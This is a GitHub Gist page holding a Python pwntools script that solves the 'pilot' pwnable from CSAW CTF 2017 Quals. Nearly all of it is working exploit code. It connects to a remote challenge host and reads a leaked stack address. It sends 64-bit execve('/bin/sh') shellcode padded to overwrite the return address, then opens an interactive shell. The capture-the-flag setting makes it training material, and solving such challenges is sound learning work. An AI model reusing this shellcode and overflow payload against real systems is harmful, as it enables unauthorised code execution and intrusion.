Created
September 24, 2017 18:00
-
-
Save 0xdeadbeefJERKY/399e8367e5fc321b65bf1f40e076f801 to your computer and use it in GitHub Desktop.
Python script to solve 'pilot' pwnable from CSAW CTF 2017 Quals
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from pwn import * | |
import argparse | |
parser = argparse.ArgumentParser(description='pwntools skeleton') | |
parser.add_argument('-l', action="store_true", default=False) | |
args = parser.parse_args() | |
# check if target is local binary or remote | |
if args.l: | |
print '[+] Going local...' | |
r = process('./pilot') | |
else: | |
print '[+] Going remote...' | |
r = remote('pwn.chal.csaw.io', 8464) | |
# read response until "Location:" string is found | |
r.recvuntil('Location:') | |
# store "Location" address in variable | |
address = r.recvuntil('\n')[:-1] | |
print '[+] Target Address: {}'.format(address) | |
# 64-bit Linux '/bin/sh' shellcode | |
shell_please = "\x31\xc0\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\xb0\x3b\x48\x89\xe7\x31\xf6\x31\xd2\x0f\x05" | |
# prepend shellcode, pad with "A"s and append "Location" address as little-endian, 64-bit address | |
payload = shell_please + 'A' * (40-len(shell_please)) + p64(int(address, 16)) | |
r.send(payload) | |
# interact with shell | |
r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment